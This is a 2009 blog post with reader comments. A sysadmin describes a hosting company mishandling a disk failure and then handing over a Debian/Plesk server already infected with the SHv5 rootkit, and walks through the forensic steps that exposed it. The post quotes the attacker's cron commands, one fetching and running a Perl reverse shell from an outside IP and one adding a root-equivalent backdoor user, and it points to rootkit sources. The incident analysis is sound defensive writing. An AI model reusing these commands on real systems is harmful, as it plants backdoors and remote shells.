Epic fail from a hosting company involving bad customer support and a critical security issue

To cut the story as short as possible let’s say that someone rents some dedicated servers somewhere in a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed, then the hosting company did a huge mistake, I notified them about it and then they did another even bigger mistake (security issue) on the next day, October 2nd. I re-notified them about it…
So you can either read the whole story or if you are only interested on the security issue, skip the first day and go straight to October 2nd.

Some details, the server had 2 disks, sda with the OS (Debian 4.0) with Plesk control panel and sdb which had some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting’s company control panel.
10:15 I contacted the company’s support by email and notified them of the problem.

10:23 I got an email that the engineers would take a look at he problem as soon as possible.
11:01 I got another email from an engineer telling me that he will take a look at the server and will notify me with updates on the issue.
11:36 I got the following email:

There is something wrong with either the drive or the drives drivers.
While booting it gives strange errors that the drive is busy and cant be
accessed. After rebooting it gives me a bootdisk failure.

I will run some tests on the drive to see if it is faulty. If so I will
update you and replace the drive.

This all is regarding the first drive ‘sda’.

I hope to have informed you sufficient. When I know more I will update you.

11:59 Another email from tech support:

I would like to update you about the following.

After trying to do some tests the only result I have is that the drive
can’t be found by my harddrive checking software. This usually indicates
that the drive is faulty.

I hope you have all your data back-upped or you have it on the second
disk (which seems to be fine).

I will replace the harddrive for you and reinstall your system.

When this is done I will update you. If you have any questions or
suggestions before I replace the drive please let me know.

I hope to have informed you sufficient.

12:08 I replied:

You have informed me more than sufficiently…unfortunately though you
didn’t have any good news to tell me…

I have backups offline, and I might even have some on the second disk
as far as I can remember. So just re-install Debian with Plesk on it
and I will import back my settings.

Thanks a lot for your time and work, I really appreciate it

14:41 New email from tech support:

I would like to inform you about your server XXX.

Fortunately i have good news for you! Because you (seem to have) used your harddrive in a
raid-1 configuration, i was able to replace the broken harddrive. After this i was able to
succesfully boot your machine. After checking: the new harddrive is being recognized and it
is ready to use.

Hope to have informed you sufficiently. If you have any further questions do not hesitate to
contact us again.

Now, THAT was strange. There was no raid-1 config on the drives. The machine was pingable and I could ssh to it. I entered the box and I found myself in the old sda drive but with a totally different sdb disk attached. It was a disk with another installation inside, from someone else who had a raid-1 config. I can only guess that tech support somehow mixed up the disks from his box and “my” server so I got his second raid-1 disk. sda was _NOT_ changed! That meant that the “backup” disk was gone but sda was working. I quickly created a backup dir on sdb and rsync-ed the whole sda to sdb, sdb had just a basic install inside, only 3Gb out of 80Gb were used. Some files were corrupt though and S.M.A.R.T. reported errors from time to time while copying.

15:23 I emailed them back to notify them that they did not actually change sda

The box might be up but the disk (sda) is in a very bad condition.
S.M.A.R.T checks report this
Oct 1 14:09:04 XXX smartd[2889]: Device: /dev/sda, 1 Offline
uncorrectable sectors

I can’t use mysql as well, it reports broken tables. I can restore the
tables from backup but I would need a good working disk to do that.

From the following 2 diagrams I can see that you replaced sdb and not sda.
http://XXX/munin/YYY/XXX-smart_sda.html
http://XXX/munin/YYY/XXX-smart_sdb.html

Can you please let me know of what changed ? I got confused.
If possible please call me at +555-1234 or +5555-5678 for details

16:52 Email response from tech support:

Regarding your server XXX, I would like to inform you with the following.

It indeed looks like we replaced the wrong drive for you. Since I read
you have offline backups. I would like to replace both harddrives in
your server.

Please let us know if we can replace both drives and reinstall your
server from scratch.

If you have any other questions, don’t hesitate to contact us again.

17:05 I replied:

Since you have replaced sdb already I took another system backup on
that disk in order to save bandwidth and precious time.

What I would like from you to do is to see whether you can take an
exact image of “sda” to another 80Gb disk and put that new sda disk on
the machine to boot (probably using a disk imaging tool or linux dd
command). That would save both you and me looooots of time since I
would just have to replace the damaged files on the system and you
don’t have to re-install.

If imaging sda fails, then you can resort back to re-installing.

To help you identify the drives:
sda is Western Digital:
=== START OF INFORMATION SECTION ===
Model Family: Western Digital Caviar SE (Serial ATA) family
Device Model: WDC WD800JD-75MSA1
Serial Number: WD-XXXXXXXXXXXX
Firmware Version: 10.01E01
User Capacity: 80,000,000,000 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: Exact ATA specification draft version not indicated
Local Time is: Thu Oct 1 16:03:19 2009 CEST
SMART support is: Available – device has SMART capability.
SMART support is: Enabled

and sdb is Maxtor:
=== START OF INFORMATION SECTION ===
Model Family: Maxtor DiamondMax Plus 9 family
Device Model: Maxtor 6Y080M0
Serial Number: YYYYYYYYYY
Firmware Version: YAR51HW0
User Capacity: 80,000,000,000 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: ATA/ATAPI-7 T13 1532D revision 0
Local Time is: Thu Oct 1 16:04:08 2009 CEST
SMART support is: Available – device has SMART capability.
SMART support is: Enabled

Please leave Maxtor (sdb) as it is!

I clearly did not want to tell them that sdb had the installation of another guy because I wasn’t sure that they would be able to bring me back my old sdb. If they couldn’t I would have to transfer all the backup data I had offline through the net, which would surely take a reaaaaally longer time than copying from disk to disk. If they left the new sdb on the box though I could easily copy most part of the system to the “new” sda when they would put it and only restore the corrupted files.

18:05 New email from tech support

In reply to your email, I would like to inform you with the following.

One of our engineers will try making an image of sda to a new disk as
soon as possible. The engineer will update you about the progress.

If you have any qeustions in the meantime, don’t hesitate to contact us

October 2nd
09:52 New email from tech support:

I would like to inform you on this ticket.

Your server was re-installed with Debian last night.
This morning I have completed the Plesk install.

Server details:

– XXX
– IP: AA.BB.CC.DD
– Password (root): ABCDEFGHIJK

Plesk Details:

– Plesk 8.6
– https://AA.BB.CC.DD:8443
– Password (admin):LMNOPQRSTU

If you need any further support on this ticket, please inform us.

This is a really bad policy. Sending an email with root login details is totally unacceptable for my security standards, and I usually don’t nag about security _that_ much. But an email with the root password ? Come oooon….

Anyway, I started the restore procedure from sdb to sda. At about 12:00 everything was mostly working again. At about 14:00 I had this brilliant idea to upgrade the kernel. The box had 2.6.18-6-486 so I decided to install 2.6.24-etchnhalf.1-686. The output of apt-get install linux-image-2.6.24-etchnhalf.1-686 was a bit weird though. It contained these lines among others:
Searching for splash image ... none found, skipping ...
/bin/ls: invalid option -- v Try `/bin/ls --help' f or more information

ls did not have a “-v” option ? This couldn’t be right…I issued an ls -v manually:
# /bin/ls -v
/bin/ls: invalid option -- v
Try `/bin/ls --help' for more information.
# /bin/ls --version
ls - GNU fileutils-3.1

Gnu fileutils ? I go check /bin/ls on another Debian 4.0 box. ls -v works there and I also get

# ls --version
ls (GNU coreutils) 5.97
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software.  You may redistribute copies of it under the terms of
the GNU General Public License <http://www.gnu.org/licenses/gpl.html>.
There is NO WARRANTY, to the extent permitted by law.

Written by Richard Stallman and David MacKenzie.

I checked /mnt/backup/bin/ls (the sdb drive I had taken a backup of the previous sda). It correctly showed the coreutils 5.97 version.
I started thinking that something was totally wrong with the installation. I tried to reinstall coreutils. Then I got a new set of errors.
unable to make backup link of `./bin/ls' before installing new version: Operation not permitted

Ok…I knew by then that this was BAD. The machine was probably hacked and had some type of rootkit installed. I just wanted to make sure.
# lsattr /bin/ls
s---ia------- /bin/ls
# lsattr /bin/ps
s---ia------- /bin/ps
# lsattr /sbin/ifconfig
s---ia------- /sbin/ifconfig
# lsattr /bin/netstat
s---ia------- /bin/netstat
# lsattr /usr/bin/md5sum
s---ia------- /usr/bin/md5sum

Helloooo rootkit. The files had the following extended attibutes set:
a: A file with the ‘a’ attribute set can only be open in append mode for writing. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.
i: A file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.
s: When a file with the ‘s’ attribute set is deleted, its blocks are zeroed and written back to the disk.

Using the ps executable from /mnt/backup/bin/ps I was able to check the processes for things that did not appear when using the trojaned /bin/ps.
I diff-ed the output of the 2 ps commands and here’s the result:

root      2695  0.0  0.0   2064   512 ?        Ss   10:59   0:00 /sbin/ttyload -q
root      2697  0.0  0.0   1692   568 ?        S    10:59   0:00 ttymon tymon

I opened vim on /sbin/ttyload file and I saw among the headers:
^@$Info: This file is the propert of SH-crew team designed for test purposes. $
^@$Nr: SH- April/2003 produced in SH-labs for Linux Systems.Run and enjoy. $

A netstat -anp using a /mnt/backup/bin/netstat showed ttymon listening on raw:1 socket.

But how was ttymon loaded at startup ?
Inside the /etc/inittab file I found the following:
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload

/usr/sbin/ttyload contained the following:
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1

With Google’s precious help I was able to determine/identify that the rootkit installed was SHv5.

Ok, the server was hacked, it contained a rootkit but how did the attacker manage to compromise it ? I started checking on the logs. Syslog first of course. I used /mnt/backup/usr/bin/less /var/log/syslog, among other useless things I saw the following entries:
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21227]: (root) CMD (cd /var/ && rm -rf prs2.pl && wget http://QQ.RR.EE.TT:64891/prs2.pl && perl prs2.pl && echo main.c)
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21229]: (root) CMD (/usr/sbin/useradd -d /usr/local/psa/plesk -g root -G root -s /bin/sh -p "9XRcZIXmTrZ/6" plesk-root && /usr/sbin/usermod -u 0 -o plesk-root)

So there was a crontab entry which download a file, ran it and then another crontab entry created a new user called plesk-root.
I downloaded the prs2.pl file and it was a perl reverse shell. It’s apparent that whoever did it had already access to the box at 08:23 in order to install the crontab entry, remember that I was given access to the box by the email sent at 09:52.

That made me FURIOUS. I can’t stress furious with enough boldness…only a <blink> tag can show how mad I was at the time with the tech support.

I notify the guy who told me to take a look at the server and we decide that I would go to his office to call the hosting company’s tech support on the phone. While driving I also called a friend to ask him about raw socket listening details…(thanks man).

I arrive at his office, I show him my findings and we call tech support. I try to explain to the nice lady that picked up the phone that I had a serious security issue with a dedicated server and that I wanted to speak to the specific engineer that installed the server, I knew his name from the emails. Instead of giving me that specific engineer I was transfered to talk to another guy. I told him the ticket number and he put me on hold for 10 minutes to read the ticket. He then came back and I told him to login to the box. He said he couldn’t. I told him that I have changed the sshd port to port number XXX but he said he could still not login. I told him to use ssh -p XXX root@IP to login but he said he couldn’t login. He also asked me to reset the root password to the one they sent by email. I couldn’t stand him much longer so I told him I would do it and that I would send him specific login details by email and that he should call me back immediately after receiving the email. And so I did.

15:53 I sent the tech support the following email:

ssh -p 222 root@AA.BB.CC.DD
the password is: ABCDEFGHIJK

telephone number: +5555-3456

Nothing was happening. They neither called me nor logged inside the box.

16:10 I sent another email…and I was angry…really angry

what’s taking you so long…I told you this is an important security
issue on your side and you had me 10minutes on call waiting…You told
me you couldn’t connect with ssh (??) and I mailed you back the login
details and still nothing happens after another 15 minutes.

Not even an attempt to login to the box. Please call me at
5555-3456 as soon as possible.

16:32 The phone rings and an engineer tells me he finally logged inside the box and that he was waiting for my instructions on what to look at. At that moment I was writing a new email to them, so I sent it to him and told him to read it and then I could show him more details. I sent him the following email:

The following excerpt from syslog clearly show that the machine was
compromised _before_ you gave it to me…

Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21227]: (root) CMD (cd /var/ &&
rm -rf prs2.pl && wget http://195.67.149.70:64891/prs2
.pl && perl prs2.pl && echo main.c)
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21229]: (root) CMD
(/usr/sbin/useradd -d /usr/local/psa/plesk -g root -G root -s /bin/
sh -p “9XRcZIXmTrZ/6” plesk-root && /usr/sbin/usermod -u 0 -o plesk-root)

I entered the machine at 9:30. This is the output of last command:
root pts/0 ppp-94-68-80-4.h Fri Oct 2 09:29 – 10:33 (01:04)
root pts/0 85.17.130.250 Fri Oct 2 08:30 – 09:03 (00:33)

At first he denied that it was their problem. Then I started almost shouting at the phone and told him to pay attention at the time. I also told him about the attributes of the files trojaned ls,ps,netstat,etc files… He finally apologized and said that this was a terrible error from their side and that he would forward the ticket to a specific security group inside the tech support for further investigation.

16:50 I receive another call and they told me that they found out that their Plesk installation script “used a default password while installing” and that was taken advantage by the attacker and he got access to Plesk and then of course he could do anything he wanted. He apologized again and he asked me what I wanted to do. I told him that I wanted him to replace sda again with a new disk and re-install Debian and Plesk with caution. I was specific to let him know that I didn’t want them to even touch sdb. I also told him that I needed some 30minutes time to take backups from the disk. We agreed to send them an email when I would be ready.

I didn’t actually want to take a backup of the system, I had the backup on the sdb drive. What I wanted to do was to cover as much evidence as possible from the rootkit and see whether the attacker had anything left on the box. I couldn’t find much, so I just gathered some trojan executables, the ttymon, ttyload files and put them on a tarball and then to sdb.

17:11 I sent them an email:

As we agreed please proceed in re-installing the system on sda leaving
sdb _as it is_.

17:48 Email from tech support:

In reply to your email, I would like to inform you with the following.

I’ll start the installation as soon as possible. And I will inform you
about the progress.

If you have any questions in the meantime, don’t hesitate to contact me
again.

Again nothing was happening for hours and hours…

22:01 I sent them a new email:

Hello,
I was told on the phone that the installation would take place today.
I still can’t see anyone shutting down the box and re-installing
it…is someone taking care of this ticket ?

October 3rd
02:47 I finally receive an email from tech support

I would like to update you on the status of your ticket.

I apologise for the delay with the reinstallation of your server. I will
begin the reinstall shortly.

I will keep you informed.

03:33 I reply:

This issue is getting harder and harder to solve by the hour, first
you change the wrong disk, then you hand me a compromised box and now
I get this big delay…
This should have been a priority ticket at least since the security
incident. I think we deserved some more attention…

04:17 I got a reply:

Thank you for your mail. I would like to update you on the status of
your server.

I am in the process of reinstalling your server. All that remains is to
complete the Plesk installation. I am doing my best to complete this for
you as soon as possible.

I will inform you once the process is complete.

06:13 A new email from tech support:

I would like to update you on the status of your server.

XXX has been reinstalled with Debian 4 32-bit and Plesk 8.6. The
details are as follows:

LOGIN
IP Address: AA.BB.CC.DD
Password: ABCDEFG

PLESK
Url: https://AA.BB.CC.DD:8443
Username: admin
Password: KLMNOPQR

Please do not hesitate to contact us if you require any further assistance.

before doing any copying of files from sdb to sda I checked the server for ls -v…

Some notes as a conclusion.
i) This is the worst customer support I’ve seen to date. I’ve opened tickets before on that hosting company, even for similar cases like replacing disks, motherboard and RAM and I always got first class customer support. This makes me think that its the specific engineers who handled my ticket are the root of the problem and not the tech support team as a whole. Should I call their supervisor and notify him explicitly on the problem they created or should I just try to forget about them ?
ii) It really strikes me as odd that the attacker knew the exact time and IP of the box at the seconds of the Plesk installation. I know this might sound like a conspiracy theory, but there’s a good chance that the engineer who handled the first installation was somehow involved with the attack. Maybe his box is also compromised by the attacker. The 2 installations on the box happened by a different engineer each time. In fact the guy who did the first installation has never responded to any further emails of the ticket. The ticket was probably handed off to some other engineers.
iii) Never ever trust a box you’ve been handed to be safe and secure. At least I won’t ever again. An automated attack doesn’t take more than a few seconds to take place. Don’t use any of your passwords on a new box. Don’t ssh to anywhere else before you make sure there’s nothing wrong with it. I was lucky this time because I didn’t connect to any other server, but from now own this will be a “policy” for me.
iv) How stupid is it to send a cleartext email with a root password and the IP of a box in it ? The hosting company has a control panel secured by HTTPS with a valid certificate, they should use that control panel to provide new login details to customers. Sending cleartext login details by email is totally unacceptable as a hosting company policy.
v) I think the owner of the box reserves some refund by the hosting company. The guy pays quite a lot of money to the hosting company for this dedicated box and for the others, they delayed him and if I weren’t careful enough he could have been handed with a trojaned box and keep using it for a long long time. I could also have been thanked for what I told them. Their installation scripts were bad/faulty/compromised/whatever, there could be a dozen/hundred other infected boxes on that hosting company right now. I don’t want to go public with the name of the hosting company yet since it’s still early and it’s a weekend, but if they don’t do something on the next couple of days I think that I should do it. What do you people think on this ?

Files: i) prs2.pl
ii) SHv5 rootkit: just google for shv5.tar.gz…you’ll get lots of sources.

References: a) http://forums.debian.net/viewtopic.php?p=160255
b) http://www.linuxforums.org/forum/linux-security/47606-shv4-shv5-rootkit-installed.html
c) http://www.jigsawboys.com/2008/06/01/lead-story-test/
d) http://www.hacker-soft.net/tools/Papers/redhat-compromise.pdf (thanks to the guy with the raw socket details :))

6 Responses to “Epic fail from a hosting company involving bad customer support and a critical security issue”

  1. October 4th, 2009 | 16:15
    Using WordPress WordPress 2.7.1

    […] from:  Epic fail from a hosting company involving bad customer support and a critical security issue Bookmark It Hide Sites $$('div.d7242').each( function(e) { […]

  2. October 4th, 2009 | 16:48
    Using Safari Safari 531.9 on Mac OS X Mac OS X 10.6.1

    I don’t want to be evil or pedantic here, but I think that you should at least send an email and report this to the tech manager. Maybe the tech support had a bad day, or you find the only guy who was not able to pay attention, however if you pay for a service and you don’t get it. You should at least *say something*.

    It’s part of the Greek culture to consider *reporting* a problem worse than the actual problem.

  3. October 4th, 2009 | 23:40
    Using WordPress WordPress 2.8.4

    […] See the rest here:  Epic fail from a hosting company involving bad customer support … […]

  4. mmc
    October 13th, 2009 | 12:19
    Using Mozilla Firefox Mozilla Firefox 3.0.14 on Ubuntu Linux Ubuntu Linux

    As President of the Committee for the Liberation and Integration of Trolls and there Re-introduction Into Society I object to your generalization.

  5. Hossam
    October 16th, 2009 | 10:00
    Using Mozilla Firefox Mozilla Firefox 3.5.3 on Windows Windows XP

    About ii) It really strikes me as odd that the attacker knew the exact time and IP of the box at the seconds of the Plesk installation. I know this might sound like a conspiracy theory, but there’s a good chance that the engineer who handled the first installation was somehow involved with the attack.

    I can ensure you that this is a conspiracy theory indeed. There is a security vulnerability within plesk, at least in version 8.2, as once I installed it on a new fresh server it got hacked exactly the same way in a matter of hours. I can’t think of anything other than hackers being widely scanning port 8443 to find the vulnerability and exploit it.

  6. April 7th, 2010 | 23:13
    Using Mozilla Firefox Mozilla Firefox 3.6.3 on Linux Linux

    Could you tell which hosting company was it?

    I had *exactly* the same issue (infection) with Godaddy virtual server – as I got it provisioned, it was already infected, in a way you describe.

Leave a reply